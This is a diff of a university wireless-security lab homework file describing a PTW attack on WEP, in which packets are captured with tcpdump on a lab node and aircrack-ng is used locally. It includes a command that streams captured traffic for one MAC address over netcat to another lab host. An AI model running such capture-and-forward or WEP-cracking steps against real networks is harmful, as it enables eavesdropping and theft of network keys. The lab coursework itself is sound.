ribafish/WirelessLabGroup06/group06_hw08/Question1.md

 ### PTW attack with `tcpudmp` on node6:

+We used tcpdump on node6 to capture packets, because `airodump-ng` makes the files locally and we couldnt find a way to forward them to stepping stone, which was needed because of lack of space on nodes.
+We then used the `aircrack-ng` suite on our local machines, because it wasn't installed on SteppingStone.

 #### First try:

 ###### Capture packets:

-We used tcpdump, because `airodump-ng` makes the files locally and we couldnt find a way to forward them to stepping stone, which was needed because of lack of space on nodes.

 ```
 tcpdump -i wlan1 -G 10800 -W 1 -w- -s 65535 ether src or dst 00:1b:b1:01:dc:b2 | nc 172.17.3.1 8080 &